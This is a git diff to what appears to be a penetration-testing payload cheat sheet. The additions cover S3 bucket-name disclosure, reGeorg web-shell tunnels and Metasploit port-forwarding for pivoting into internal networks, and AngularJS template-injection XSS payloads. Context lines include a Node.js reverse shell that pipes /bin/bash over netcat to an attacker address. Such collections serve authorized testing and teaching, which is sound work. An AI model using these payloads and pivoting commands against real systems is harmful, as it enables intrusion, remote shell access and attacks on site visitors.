diff --git a/AWS Amazon Bucket S3/README.md b/AWS Amazon Bucket S3/README.md
index 13d257a..53e27d1 100644
--- a/AWS Amazon Bucket S3/README.md	
+++ b/AWS Amazon Bucket S3/README.md	
@@ -36,6 +36,14 @@ Their names are also listed if the listing is enabled.
 <Name>adobe-REDACTED-REDACTED-REDACTED</Name>
 ```
 
+Alternatively you can extract the name of inside-site s3 bucket with `%C0`. (Trick from https://twitter.com/0xmdv/status/1065581916437585920)
+
+```xml
+http://example.com/resources/id%C0
+
+eg: http://redacted/avatar/123%C0
+```
+
 ## Basic test - Listing the files
 
 ```bash
diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md
index d49e426..be5a125 100644
--- a/Methodology and Resources/Network Pivoting Techniques.md	
+++ b/Methodology and Resources/Network Pivoting Techniques.md	
@@ -59,8 +59,38 @@ Set the SOCKS4 proxy then `proxychains nmap -sT 192.168.5.6`
 
 [reGeorg](https://github.com/sensepost/reGeorg), the successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.
 
+Drop one of the following files on the server:
+
+- tunnel.ashx
+- tunnel.aspx
+- tunnel.js
+- tunnel.jsp
+- tunnel.nosocket.php
+- tunnel.php
+- tunnel.tomcat.5.jsp
+
 ```python
-python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp
+python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp # the socks proxy will be on port 8080
+
+optional arguments:
+  -h, --help           show this help message and exit
+  -l , --listen-on     The default listening address
+  -p , --listen-port   The default listening port
+  -r , --read-buff     Local read buffer, max data to be sent per POST
+  -u , --url           The url containing the tunnel script
+  -v , --verbose       Verbose output[INFO|DEBUG]
+```
+
+## Metasploit
+
+```c
+portfwd list
+portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445
+
+or
+
+run autoroute -s 192.168.57.0/24
+use auxiliary/server/socks4a
 ```
 
 ## Rpivot
@@ -140,4 +170,5 @@ plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your loc
 * [Network Pivoting Techniques - Bit rot](https://bitrot.sh/cheatsheet/14-12-2017-pivoting/)
 * [Port Forwarding in Windows - Windows OS Hub](http://woshub.com/port-forwarding-in-windows/)
 * [Using the SSH "Konami Code" (SSH Control Sequences) - Jeff McJunkin](https://pen-testing.sans.org/blog/2015/11/10/protected-using-the-ssh-konami-code-ssh-control-sequences)
-* [A Red Teamer's guide to pivoting- Mar 23, 2017 - Artem Kondratenko](https://artkond.com/2017/03/23/pivoting-guide/)
\ No newline at end of file
+* [A Red Teamer's guide to pivoting- Mar 23, 2017 - Artem Kondratenko](https://artkond.com/2017/03/23/pivoting-guide/)
+* [Pivoting Meterpreter](https://www.information-security.fr/pivoting-meterpreter/)
\ No newline at end of file
diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md
index 44248b8..cd8423f 100644
--- a/Methodology and Resources/Reverse Shell Cheatsheet.md	
+++ b/Methodology and Resources/Reverse Shell Cheatsheet.md	
@@ -153,6 +153,10 @@ or
 
 -var x = global.process.mainModule.require
 -x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')
+
+or
+
+https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py
 ```
 
 ### Groovy - by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76)
diff --git a/XSS injection/XSS in Angular.md b/XSS injection/XSS in Angular.md
index adfb754..85c1076 100644
--- a/XSS injection/XSS in Angular.md	
+++ b/XSS injection/XSS in Angular.md	
@@ -1,5 +1,13 @@
 # XSS in Angular
 
+> Angular as of version 1.6 have removed the sandbox altogether
+
+Angular 1.6+ by [Mario Heiderich](https://twitter.com/cure53berlin)
+
+```javascript
+{{constructor.constructor('alert(1)')()}}
+```
+
 Angular 1.6+ by [@brutelogic](https://twitter.com/brutelogic/status/1031534746084491265)
 
 ```javascript
@@ -8,7 +16,7 @@ Angular 1.6+ by [@brutelogic](https://twitter.com/brutelogic/status/103153474608
 
 Example available at [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?a=<brute+ng-app>%7B%7B[].pop.constructor%26%2340%27alert%5Cu00281%5Cu0029%27%26%2341%26%2340%26%2341%7D%7D)
 
-Angular 1.6.0 [@LewisArdern](https://twitter.com/LewisArdern/status/1055887619618471938) & [@garethheyes](https://twitter.com/garethheyes/status/1055884215131213830)
+Angular 1.6.0 by [@LewisArdern](https://twitter.com/LewisArdern/status/1055887619618471938) & [@garethheyes](https://twitter.com/garethheyes/status/1055884215131213830)
 
 ```javascript
 {{0[a='constructor'][a]('alert(1)')()}}
@@ -16,7 +24,7 @@ Angular 1.6.0 [@LewisArdern](https://twitter.com/LewisArdern/status/105588761961
 {{$on.constructor('alert(1)')()}}
 ```
 
-Angular 1.5.9
+Angular 1.5.9 - 1.5.11 by [Jan Horn](https://twitter.com/tehjh)
 
 ```javascript
 {{
@@ -139,4 +147,8 @@ Vue JS
 
 ```javascript
 {{constructor.constructor('alert(1)')()}}
-```
\ No newline at end of file
+```
+
+## Thanks
+
+- [](https://portswigger.net/blog/xss-without-html-client-side-template-injection-with-angularjs)
\ No newline at end of file